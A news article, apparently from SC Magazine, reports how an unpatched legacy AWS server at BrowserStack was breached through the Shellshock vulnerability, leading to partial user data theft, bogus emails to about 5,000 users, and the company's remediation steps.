A machine was not properly patched and, as a result, was penetrated by an attacker using the Shellshock exploit.
A machine was not properly patched and, as a result, was penetrated by an attacker using the Shellshock exploit.

Cross browser testing provider BrowserStack experienced an attack on Sunday that resulted in partial user information being accessed and, subsequently, bogus emails being sent to about 5,000 users.

BrowserStack application servers run on Amazon Web Services (AWS) and the configuration consists of thousands of servers, one of which was an old prototype machine running since prior to 2012 and no longer in active use, a notification posted to the BrowserStack website indicates.

That machine was not properly patched and, as a result, was penetrated using the Shellshock vulnerability, according to the notification, which explains how the attacker was able to copy a BrowserStack table containing partial user information that included email IDs, hashed passwords and last tested URLs.

“[The attacker] just started copying users table when we stopped him,” Ritesh Arora, one of the founders of BrowserStack, told SCMagazine.com in a Wednesday email correspondence. “They got a portion of our users email addresses, but were only able to email around 5000 of them by the time we came in and blocked our AWS keys.”

The email, which was posted to Pastebin on Wednesday, claimed to be from The BrowserStack Team and purported that BrowserStack lied to customers with regard to security in its terms of service, that all data had likely been compromised, and that the company is shutting down.

“We don't know yet, [but it] looks like a very deliberate attempt to malign us,” Arora said. The post indicates that BrowserStack has “a trace and the IP of the hacker” and will be in touch with authorities, but Arora could not share any more details.

BrowserStack has revoked existing AWS keys and passwords and generated new ones, migrated all backups to encrypted backups and removed unencrypted ones, sifted through logs to ensure of no other compromises, and added new checks and alerts, according to the notification.

The BrowserStack service was taken down upon discovery of the incident, inconveniencing users for several hours, the notification adds. “This incident has made us better as a team, increased our security and commitment to customers,” Arora said.